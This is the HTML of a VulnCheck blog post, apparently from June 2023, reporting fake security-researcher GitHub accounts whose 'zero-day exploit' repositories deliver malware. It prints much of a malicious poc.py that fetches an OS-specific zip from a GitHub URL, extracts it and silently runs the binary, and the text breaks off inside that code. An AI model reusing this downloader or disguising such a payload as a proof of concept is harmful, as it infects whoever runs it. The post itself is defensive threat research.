<!DOCTYPE html>
<html lang="en">
<head><meta charset="utf-8">
<meta charset="utf-8">
<style id="nuxt-ui-colors">:root {
--color-primary-100: 201 202 235;
--color-primary-200: 160 161 215;
--color-primary-300: 119 120 194;
--color-primary-400: 78 79 171;
--color-primary-500: 102 103 171;
--color-primary-600: 62 63 112;
--color-primary-700: 54 55 95;
--color-primary-800: 46 46 79;
--color-primary-900: 38 38 64;
--color-gray-50: 248 250 252;
--color-gray-100: 241 245 249;
--color-gray-200: 226 232 240;
--color-gray-300: 203 213 225;
--color-gray-400: 148 163 184;
--color-gray-500: 100 116 139;
--color-gray-600: 71 85 105;
--color-gray-700: 51 65 85;
--color-gray-800: 30 41 59;
--color-gray-900: 15 23 42;
--color-gray-950: 2 6 23;
}</style>
<title>Fake Security Researcher GitHub Repositories Deliver Malicious Implant - Blog - VulnCheck</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="msapplication-TileColor" content="#6667ab">
<meta name="theme-color" content="#6667ab">
<meta property="og:type" content="website">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="mobile-web-app-capable" content="yes">
<meta name="apple-mobile-mobile-web-app-status-bar-style" content="#362f79">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="icon" id="favicon" type="image/x-icon" href="/favicon.ico">
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#6667ab">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
<link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Montserrat:wght@300;400&display=swap" media="screen">
<script src="//cdnjs.cloudflare.com/ajax/libs/lottie-web/5.8.1/lottie.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/autosize.js/4.0.2/autosize.min.js" async=""></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/numeral.js/2.0.6/numeral.min.js" async=""></script>
<meta name="description" content="VulnCheck discovers a network of fake security researcher accounts promoting hidden malware.">
<meta itemprop="name" content="Fake Security Researcher GitHub Repositories Deliver Malicious Implant - Blog - VulnCheck">
<meta itemprop="description" content="VulnCheck discovers a network of fake security researcher accounts promoting hidden malware.">
<meta itemprop="image" content="https://vulncheck.com/cards/blog/fake-repos-deliver-malicious-implant.png">
<meta property="og:site_name" content="Fake Security Researcher GitHub Repositories Deliver Malicious Implant - Blog - VulnCheck">
<meta property="og:url" content="https://vulncheck.com/blog/fake-repos-deliver-malicious-implant">
<meta property="og:image" content="https://vulncheck.com/cards/blog/fake-repos-deliver-malicious-implant.png">
<meta property="og:title" content="Fake Security Researcher GitHub Repositories Deliver Malicious Implant - Blog - VulnCheck">
<meta property="og:description" content="VulnCheck discovers a network of fake security researcher accounts promoting hidden malware.">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://vulncheck.com/cards/blog/fake-repos-deliver-malicious-implant.png">
<meta name="twitter:title" content="Fake Security Researcher GitHub Repositories Deliver Malicious Implant - Blog - VulnCheck">
<meta name="twitter:description" content="VulnCheck discovers a network of fake security researcher accounts promoting hidden malware.">
<meta property="og:title" content="Fake Security Researcher GitHub Repositories Deliver Malicious Implant - Blog - VulnCheck">
<meta name="description" content="VulnCheck discovers a network of fake security researcher accounts promoting hidden malware.">
<meta property="og:description" content="VulnCheck discovers a network of fake security researcher accounts promoting hidden malware.">
<meta property="og:image" content="blog/fake-repos-deliver-malicious-implant.png"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/entry.cda04c5a.js"><link rel="preload" as="style" href="/_nuxt/entry.919f6fbd.css"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/blog.8b5c473e.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/PublicFooter.vue.36b34b94.js"><link rel="preload" as="style" href="/_nuxt/PublicFooter.23f5b94b.css"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/HeaderLogoText.vue.3f11a801.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/HeaderEnvironment.vue.1bb95e63.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/Icon.5c1a6249.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/TransitionDirectionGroup.vue.ce87c56a.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/TransitionScaleIn.vue.70e62815.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/utils.4cf7fe3e.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/menu.67403bb7.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/PublicButtonChevron.cbc4bb3b.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/client-only.63b6e233.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/api.98c6bfce.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/cookie.c4b2681a.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/contactModal.73c02624.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/HeaderDarkMode.vue.a3883d9e.js"><link rel="preload" as="style" href="/_nuxt/HeaderDarkMode.1f351bfd.css"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/HeaderLogo.efe53ad1.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/themes.5721886f.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/FormInput.vue.b9d5f184.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/TransitionDropdown.60fcc71a.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/PublicWrapper.vue.1d07b770.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/PublicDivider.vue.8710c38f.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/_slug_.ae0c406c.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/BlogEntry.vue.8947920b.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/ContentDoc.45c5d6bd.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/ContentRenderer.e60d01d1.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/ContentRendererMarkdown.76e0ba32.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/index.a6ef77ff.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/preview.7076b5a9.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/ContentQuery.c6bca579.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/asyncData.e703df89.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/query.926befa6.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/utils.80594d0c.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/dayjs.23e59353.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/meta.02e3fe48.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/CheckList.4f047615.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseP.db780a3c.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseA.22d85163.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseImg.b012a61f.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseCodeInline.717145ff.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseCode.526b0359.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseEm.dc7602df.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseH3.f879094b.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseOl.8ec15a93.js"><link rel="modulepreload" as="script" crossorigin href="/_nuxt/ProseLi.f1775d1a.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/banner.4b60255c.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/gradient.1a321d58.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/gradient.cdcdaa3d.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/bare.bf88f47c.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/nuxt-loading-indicator.9795a5b2.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/bcard-back.655bf222.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/bcard.b982918c.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/blank.fa2905d8.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/card.0e597b7f.js"><link rel="prefetch" as="style" href="/_nuxt/HeaderDefault.7a55570b.css"><link rel="prefetch" as="script" crossorigin href="/_nuxt/default.95cff1ba.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/HeaderDefault.vue.334f5b7c.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/LayoutImageInitials.vue.60678e50.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/crumbs.86dd013f.js"><link rel="prefetch" as="style" href="/_nuxt/doc.93b20154.css"><link rel="prefetch" as="script" crossorigin href="/_nuxt/doc.ec788109.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/glow-bcard.4d989e80.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/glow.77a4dfdb.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/linkedin.111e1cf6.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/public.d9f1b157.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/LayoutLogin.vue.78f38296.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/video.c861aee1.js"><link rel="prefetch" as="style" href="/_nuxt/PublicAnimation.d158a659.css"><link rel="prefetch" as="script" crossorigin href="/_nuxt/error-component.7d691d42.js"><link rel="prefetch" as="script" crossorigin href="/_nuxt/PublicAnimation.vue.74be4122.js"><link rel="stylesheet" href="/_nuxt/entry.919f6fbd.css"><link rel="stylesheet" href="/_nuxt/PublicFooter.23f5b94b.css"><link rel="stylesheet" href="/_nuxt/HeaderDarkMode.1f351bfd.css"><style>.icon[data-v-f172b434]{display:inline-block;vertical-align:middle}</style><style>pre code .line{display:block;min-height:1rem}</style><script>"use strict";(()=>{const a=window,e=document.documentElement,m=["dark","light"],c=window.localStorage.getItem("nuxt-color-mode")||"system";let n=c==="system"?f():c;const l=e.getAttribute("data-color-mode-forced");l&&(n=l),i(n),a["__NUXT_COLOR_MODE__"]={preference:c,value:n,getColorScheme:f,addColorScheme:i,removeColorScheme:d};function i(o){const t=""+o+"",s="";e.classList?e.classList.add(t):e.className+=" "+t,s&&e.setAttribute("data-"+s,o)}function d(o){const t=""+o+"",s="";e.classList?e.classList.remove(t):e.className=e.className.replace(new RegExp(t,"g"),""),s&&e.removeAttribute("data-"+s)}function r(o){return a.matchMedia("(prefers-color-scheme"+o+")")}function f(){if(a.matchMedia&&r("").media!=="not all"){for(const o of m)if(r(":"+o).matches)return o}return"light"}})();
</script></head>
<body ><div id="__nuxt"><div><!--[--><div><!----><div class="relative min-h-screen"><nav class="fixed w-full z-10 safari-fix transition-colors duration-200 ease-out transform rotate-x-3"><div class="py-4 lg:py-8 lg:max-w-screen-xl mx-auto px-6 md:px-8 lg:px-16 flex items-center justify-between transition-all duration-100"><!----><div class="relative flex items-center justify-between w-full z-10 px-2"><a href="/" class="flex transition-colors duration-200 overflow-hidden w-32 lg:w-40 flex-shrink-0 h-10" aria-label="Logo"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 800.5 160.35"><path d="M254.12,44.23l-25.3,58.09-25.07-58.09h-15.22l32.95,75.36h13.79l32.87-75.36h-14.01Zm61.05,17.88v29.01c0,11.51-6.36,17.35-15.75,17.35-8.48,0-13.41-4.92-13.41-15.38v-30.98h-13.48v32.8c0,17.34,10,25.45,24.77,25.45,7.42,0,14.24-2.8,18.56-8.1v7.35h12.8V62.11h-13.48Zm31.13,57.49h13.48V39.69h-13.48V119.6Zm63.7-58.17c-8.33,0-15.38,2.8-19.77,8.1v-7.42h-12.8v57.49h13.41v-29.09c0-11.51,6.51-17.35,16.06-17.35,8.63,0,13.71,4.92,13.71,15.15v31.28h13.41v-32.95c0-17.35-10.23-25.22-24.01-25.22h0Zm77.33,59.23c12.42,0,22.95-4.39,29.92-12.57l-9.01-8.63c-5.53,5.98-12.27,8.94-20.15,8.94-15.6,0-26.89-10.98-26.89-26.51s11.29-26.51,26.89-26.51c7.88,0,14.62,2.95,20.15,8.86l9.01-8.48c-6.97-8.18-17.5-12.65-29.84-12.65-23.1,0-40.37,16.28-40.37,38.78s17.27,38.78,40.3,38.78h0Zm74.76-59.23c-8.03,0-14.77,2.58-19.16,7.35v-29.09h-13.48V119.6h13.48v-29.09c0-11.51,6.44-17.35,15.98-17.35,8.63,0,13.71,4.92,13.71,15.15v31.28h13.48v-32.95c0-17.35-10.23-25.22-24.01-25.22h0Zm95.66,29.69c0-17.95-12.27-29.69-29.01-29.69s-29.77,12.27-29.77,29.39,12.5,29.54,31.81,29.54c9.85,0,17.95-3.26,23.1-9.39l-7.2-8.33c-4.09,4.24-9.16,6.29-15.6,6.29-10,0-17.04-5.38-18.63-13.79h45.14c.08-1.29,.15-2.88,.15-4.01h0Zm-29.01-18.94c8.79,0,15.15,5.76,16.21,14.01h-32.65c1.36-8.41,7.65-14.01,16.44-14.01h0Zm68.32,48.17c11.21,0,20.15-4.85,24.54-13.48l-10.3-6.06c-3.48,5.53-8.63,7.95-14.32,7.95-9.92,0-17.5-6.74-17.5-17.95s7.57-17.95,17.5-17.95c5.68,0,10.83,2.42,14.32,7.95l10.3-6.06c-4.39-8.71-13.33-13.33-24.54-13.33-18.18,0-31.13,12.19-31.13,29.39s12.95,29.54,31.13,29.54h0Zm79.08-.76h16.36l-26.28-33.4,24.01-24.09h-16.13l-27.95,25.83V39.69h-13.41V119.6h13.41v-15.22l10.07-9.47,19.92,24.69Z" class="fill-current text-gray-800 dark:text-white"></path><path d="M.83,68.4c-.53,3.86-.83,7.8-.83,11.74,0,19.24,6.74,36.89,18.1,50.75l9.47-10.68c-8.48-11.06-13.48-25-13.48-40.07,0-4.01,.38-7.88,1.06-11.74,.68-4.17,1.89-8.26,3.41-12.12,3.56-9.24,9.09-17.42,16.13-24.09,11.89-11.21,27.87-18.1,45.45-18.1,12.57,0,24.31,3.48,34.24,9.54l-9.54,10.68c-7.35-3.94-15.75-6.14-24.69-6.14-13.94,0-26.66,5.53-36.05,14.47-7.12,6.89-12.27,15.75-14.62,25.75h37.8l3.48,3.86,9.39,10.53h0l12.95-14.39,23.1-25.75,9.47-10.45,9.39-10.45c-3.48-3.26-7.12-6.14-11.13-8.71C111.34,4.77,96.34,0,80.14,0,58.93,0,39.61,8.26,25.3,21.74c-6.97,6.59-12.8,14.39-17.12,23.03-3.56,7.35-6.06,15.3-7.35,23.63H.83Zm36.51,62.11l-9.47,10.45c7.27,6.21,15.68,11.21,24.77,14.54,4.92,1.74,10.07,3.11,15.38,3.94,4.01,.61,8.03,.91,12.12,.91,9.7,0,18.94-1.74,27.49-4.85,9.16-3.33,17.57-8.33,24.77-14.54,17.12-14.69,27.95-36.51,27.95-60.82,0-3.94-.3-7.88-.91-11.74-.38-2.95-.98-5.91-1.74-8.71-1.36-5.23-3.26-10.15-5.6-14.92l-10.3,11.51-10.91,12.12v.08l-31.81,35.37-18.94,21.06-18.86-21.06-9.47-10.53-22.34-24.84c-.83,3.71-1.29,7.65-1.29,11.66,0,10.91,3.33,21.06,9.01,29.39,2.73,3.94,5.91,7.42,9.54,10.45,7.5,6.36,16.89,10.6,27.19,11.82,2.05,.3,4.17,.38,6.21,.38s4.24-.08,6.29-.38c2.65-.3,5.3-.83,7.8-1.51,7.2-2.05,13.79-5.6,19.39-10.3,9.24-7.73,15.75-18.71,17.88-31.13l14.39-16.06c.23,2.42,.38,4.92,.38,7.35,0,20.15-9.01,38.25-23.25,50.37-7.35,6.21-16.06,10.91-25.68,13.48-5.45,1.51-11.21,2.27-17.19,2.27h-.23c-5.91,0-11.51-.83-16.89-2.27-9.62-2.58-18.33-7.27-25.68-13.48h0Z" class="fill-current text-logo-a dark:text-white"></path></svg></a><!----><!--[--><nav class="hidden xl:flex justify-center"><div class="flex justify-center"><!--[--><a class="flex items-center py-4 px-4 relative cursor-pointer text-gray-700 hover:text-gray-500 dark:text-white"><span>Products</span><!----></a><a class="flex items-center py-4 px-4 relative cursor-pointer text-gray-700 hover:text-gray-500 dark:text-white"><span>Resources</span><!----></a><a class="flex items-center py-4 px-4 relative cursor-pointer text-gray-700 hover:text-gray-500 dark:text-white"><span>Community</span><!----></a><a class="flex items-center py-4 px-4 relative cursor-pointer text-gray-700 hover:text-gray-500 dark:text-white"><span>Company</span><!----></a><!--]--></div></nav><!----><!--]--><div class="hidden xl:flex items-center justify-center space-x-4"><span></span><button type="button" aria-label="Dark Mode Toggle" class="flex items-center justify-center rounded-full focus:outline-none"><span id="darkModeIcon" class="darkModeIcon w-8 h-8 -mr-1.5"></span></button></div><div class="xl:hidden"><button type="button" class="text-gray-700 dark:text-white inline-flex items-center justify-center p-2 rounded-md -mr-2"><span class="sr-only">Open main menu</span><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-6 h-6" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="M4 6h16v2H4zm0 5h16v2H4zm0 5h16v2H4z"/></svg></button><!----></div></div></div></nav><!--[--><div class="lg:max-w-screen-xl mx-auto px-4 md:px-8 lg:px-16 relative"><!--[--><div class="pt-32"><a href="/blog" class="flex items-center space-x-1 text-sm text-gray-700 dark:text-gray-300 hover:text-black dark:hover:text-gray-100"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-6 h-6" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="M15.41 16.58L10.83 12l4.58-4.59L14 6l-6 6l6 6l1.41-1.42Z"/></svg><span>Go back</span></a><div class="max-w-screen-md mx-auto mt-16"><time datetime="2023-06-14T00:00:00.000Z">June 14, 2023</time><h1 class="text-4xl font-bold py-4">Fake Security Researcher GitHub Repositories Deliver Malicious Implant</h1><div><div class="flex items-center space-x-2 mb-16"><img src="https://ca.slack-edge.com/T02P16KHNRY-U03S81HQS1J-19e0ae9f7b3c-512" class="w-10 h-10 rounded-full" alt="avatar"><div class="flex flex-col text-sm"><span class="font-bold">Jacob Baines</span><a href="https://twitter.com/Junior_Baines" class="text-logo-a dark:text-logo-b">@Junior_Baines</a></div></div></div><main class="md"><!--[--><div><div><h1>Key Takeaways</h1><div class="ml-2 flex flex-col space-y-2 mt-4 mb-8"><!--[--><div class="flex space-x-4 items-start"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon mt-1 w-8 h-8 flex-shrink-0 text-logo-d bg-white dark:bg-gray-800 py-1 px-1.5 rounded-md" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="m9 20.42l-6.21-6.21l2.83-2.83L9 14.77l9.88-9.89l2.83 2.83L9 20.42Z"/></svg><span>In early May, VulnCheck came across a malicious GitHub repository that claimed to be a Signal 0-day. The team reported the repository to GitHub, and it was quickly taken down. The same scenario continued throughout May.</span></div><div class="flex space-x-4 items-start"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon mt-1 w-8 h-8 flex-shrink-0 text-logo-d bg-white dark:bg-gray-800 py-1 px-1.5 rounded-md" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="m9 20.42l-6.21-6.21l2.83-2.83L9 14.77l9.88-9.89l2.83 2.83L9 20.42Z"/></svg><span>Recently, the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security, and even using headshots of legitimate security researchers from companies like Rapid7.</span></div><div class="flex space-x-4 items-start"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon mt-1 w-8 h-8 flex-shrink-0 text-logo-d bg-white dark:bg-gray-800 py-1 px-1.5 rounded-md" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="m9 20.42l-6.21-6.21l2.83-2.83L9 14.77l9.88-9.89l2.83 2.83L9 20.42Z"/></svg><span>Each High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product, including Chrome, Exchange, Discord, and more. Some of the accounts even advertise their “findings” on Twitter.</span></div><div class="flex space-x-4 items-start"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon mt-1 w-8 h-8 flex-shrink-0 text-logo-d bg-white dark:bg-gray-800 py-1 px-1.5 rounded-md" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="m9 20.42l-6.21-6.21l2.83-2.83L9 14.77l9.88-9.89l2.83 2.83L9 20.42Z"/></svg><span>Security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing, and don’t use anything you don’t understand.</span></div><!--]--></div></div><p><!--[-->As part of VulnCheck’s <a href="https://vulncheck.com/product/exploit-intelligence" rel="nofollow"><!--[-->Exploit Intelligence<!--]--></a> offering, we monitor and review large amounts of GitHub repositories. The review process exists to filter out useless, malicious, and/or scam repositories. In early May, during routine reviews, we came across an obviously malicious GitHub <a href="https://github.com/researchkendra91/signal-zeroday-exploit" rel="nofollow"><!--[-->repository<!--]--></a> that claimed to be a Signal 0-day. We reported the repository to GitHub, and it was quickly taken down.<!--]--></p><p><!--[-->The very next day, an almost identical repository was created under a different account, but this time claiming to be a <a href="https://github.com/darthvander20/whatsapp-zero-day-exploit/blob/main/poc.py" rel="nofollow"><!--[-->WhatsApp zero-day<!--]--></a>. Again, we worked with GitHub to get the repository taken down. This process kept repeating itself throughout May.<!--]--></p><p><!--[-->More recently, however, the individual(s) creating these repositories have put more effort into making them look legitimate by creating a network of accounts. The attacker has created half a dozen GitHub accounts and a handful of associated Twitter accounts. The accounts all pretend to be part of a non-existent security company called High Sierra Cyber Security. Below is an example of one such account:<!--]--></p><p><!--[--><img src="/blog/fake-repos-deliver-malicious-implant/sanderson.png" alt="GSanderson"><!--]--></p><p><!--[-->The profile looks like a normal security researcher account. The account has a headshot, followers, an associated organization, a Twitter handle, and a (dead) link to the company’s website. However, we recognized “Andrei Kuzman” was using a headshot of a <a href="https://www.rapid7.com/globalassets/_images/people/curt-barnard1.png" rel="nofollow"><!--[-->Rapid7 employee<!--]--></a>. So it appears the attacker is not only making efforts to make the profiles look legitimate, but also using headshots of actual security researchers.<!--]--></p><p><!--[-->Each High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product: Chrome, Exchange, Discord, etc. Some of the accounts even advertise their “findings” on Twitter:<!--]--></p><p><!--[--><img src="/blog/fake-repos-deliver-malicious-implant/kuzman.png" alt="Kuzman"><!--]--></p><p><!--[-->The repositories all follow a very simple formula. They all look like the following image (including tagging of “hot” CVE to attract victims):<!--]--></p><p><!--[--><img src="/blog/fake-repos-deliver-malicious-implant/layout.png" alt="Repo Layout"><!--]--></p><p><!--[--><code><!--[-->poc.py<!--]--></code> contains the code to download a malicious binary, and then execute it. The python script will download a different payload depending on the victim’s host operating system. The above Discord “0-day” uses the following code to perform these actions:<!--]--></p><!--[--><pre><code><span class="line" line="1"><span class="ct-794887">if</span><span class="ct-836158"> </span><span class="ct-869604">__name__</span><span class="ct-836158"> </span><span class="ct-794887">==</span><span class="ct-836158"> </span><span class="ct-169668">&#39;__main__&#39;</span><span class="ct-836158">:
</span></span><span class="line" line="2"><span class="ct-836158">    </span><span class="ct-794887">if</span><span class="ct-836158"> os.name </span><span class="ct-794887">==</span><span class="ct-836158"> </span><span class="ct-169668">&#39;nt&#39;</span><span class="ct-836158">:
</span></span><span class="line" line="3"><span class="ct-836158">        </span><span class="ct-794887">try</span><span class="ct-836158">:
</span></span><span class="line" line="4"><span class="ct-836158">            namezip </span><span class="ct-794887">=</span><span class="ct-836158"> </span><span class="ct-169668">&quot;cveswindows.zip&quot;
</span></span><span class="line" line="5"><span class="ct-836158">            name    </span><span class="ct-794887">=</span><span class="ct-836158"> </span><span class="ct-169668">&quot;cveswindows&quot;
</span></span><span class="line" line="6"><span class="ct-836158">            url </span><span class="ct-794887">=</span><span class="ct-836158"> </span><span class="ct-169668">&quot;https://github.com/GSandersonHSCS/discord-0-day-fix/raw/main/gitignore/cveswindows.zip&quot;
</span></span><span class="line" line="7"><span class="ct-836158">            des </span><span class="ct-794887">=</span><span class="ct-836158"> os.path.join(os.environ[</span><span class="ct-169668">&#39;TMP&#39;</span><span class="ct-836158">], namezip)
</span></span><span class="line" line="8"><span class="ct-836158">            </span><span class="ct-794887">if</span><span class="ct-836158"> </span><span class="ct-794887">not</span><span class="ct-836158"> os.path.exists(os.path.join(os.environ[</span><span class="ct-169668">&#39;TMP&#39;</span><span class="ct-836158">], name, name </span><span class="ct-794887">+</span><span class="ct-836158"> </span><span class="ct-169668">&quot;.exe&quot;</span><span class="ct-836158">)):
</span></span><span class="line" line="9"><span class="ct-836158">                urllib.request.urlretrieve(url, des)
</span></span><span class="line" line="10"><span class="ct-836158">                </span><span class="ct-794887">with</span><span class="ct-836158"> </span><span class="ct-363298">open</span><span class="ct-836158">(des, </span><span class="ct-169668">&#39;wb&#39;</span><span class="ct-836158">) </span><span class="ct-794887">as</span><span class="ct-836158"> f: f.write(urllib.request.urlopen(url).read())
</span></span><span class="line" line="11"><span class="ct-836158">                zf </span><span class="ct-794887">=</span><span class="ct-836158"> ZipFile(des, </span><span class="ct-169668">&#39;r&#39;</span><span class="ct-836158">)
</span></span><span class="line" line="12"><span class="ct-836158">                zf.extractall(os.path.join(os.environ[</span><span class="ct-169668">&#39;TMP&#39;</span><span class="ct-836158">], name))
</span></span><span class="line" line="13"><span class="ct-836158">                zf.close()
</span></span><span class="line" line="14"><span class="ct-836158">                pid </span><span class="ct-794887">=</span><span class="ct-836158"> subprocess.Popen([os.path.join(os.environ[</span><span class="ct-169668">&#39;TMP&#39;</span><span class="ct-836158">], name, name </span><span class="ct-794887">+</span><span class="ct-836158"> </span><span class="ct-169668">&quot;.exe&quot;</span><span class="ct-836158">)], </span><span class="ct-402719">creationflags</span><span class="ct-794887">=</span><span class="ct-854774">0x</span><span class="ct-360247">00000008</span><span class="ct-836158"> </span><span class="ct-794887">|</span><span class="ct-836158"> subprocess.</span><span class="ct-360247">CREATE_NO_WINDOW</span><span class="ct-836158">).pid
</span></span><span class="line" line="15"><span class="ct-836158">        </span><span class="ct-794887">except</span><span class="ct-836158">:
</span></span><span class="line" line="16"><span class="ct-836158">            </span><span class="ct-794887">pass
</span></span><span class="line" line="17"><span class="ct-836158">    </span><span class="ct-794887">else</span><span class="ct-836158">:
</span></span><span class="line" line="18"><span class="ct-836158">        url </span><span class="ct-794887">=</span><span class="ct-836158"> </span><span class="ct-169668">&quot;https://github.com/GSandersonHSCS/discord-0-day-fix/raw/main/gitignore/cveslinux.zip&quot;
</span></span><span class="line" line="19"><span class="ct-836158">        namezip </span><span class="ct-794887">=</span><span class="ct-836158"> </span><span class="ct-169668">&quot;cveslinux.zip&quot;
</span></span><span class="line" line="20"><span class="ct-836158">        name    </span><span class="ct-794887">=</span><span class="ct-836158"> </span><span class="ct-169668">&quot;cveslinux&quot;
</span></span><span class="line" line="21"><span>
</span></span><span class="line" line="22"><span class="ct-836158">        des </span><span class="ct-794887">=</span><span class="ct-836158"> os.path.join(</span><span class="ct-169668">&quot;/home/&quot;</span><span class="ct-836158"> </span><span class="ct-794887">+</span><span class="ct-836158"> os.environ[</span><span class="ct-169668">&quot;USERNAME&quot;</span><span class="ct-836158">] </span><span class="ct-794887">+</span><span class="ct-836158"> </span><span class="ct-169668">&quot;/.local/share&quot;</span><span class="ct-836158">, namezip)
</span></span><span class="line" line="23"><span class="ct-836158">        </span><span class="ct-794887">if</span><span class="ct-836158"> </span><span class="ct-794887">not</span><span class="ct-836158"> os.path.exists(os.path.join(</span><span class="ct-169668">&quot;/home/&quot;</span><span class="ct-836158"> </span><span class="ct-794887">+</span><span class="ct-836158"> os.environ[</span><span class="ct-169668">&quot;USERNAME&quot;</span><span class="ct-836158">] </span><span class="ct-794887">+</span><span class="ct-836158"> </span><span class="ct-169668">&quot;/.local/share&quot;</span><span class="ct-836158">, name, name)):
</span></span><span class="line" line="24"><span class="ct-836158">            urllib.request.urlretrieve(url, des)
</span></span><span class="line" line="25"><span class="ct-836158">            </span><span class="ct-794887">with</span><span class="ct-836158"> </span><span class="ct-363298">open</span><span class="ct-836158">(des, </span><span class="ct-169668">&#39;wb&#39;</span><span class="ct-836158">) </span><span class="ct-794887">as</span><span class="ct-836158"> f: f.write(urllib.request.urlopen(url).read())
</span></span><span class="line" line="26"><span class="ct-836158">            zf </span><span class="ct-794887">=</span><span class="ct-836158"> ZipFile(des, </span><span class="ct-169668">&#39;r&#39;</span><span class="ct-836158">)
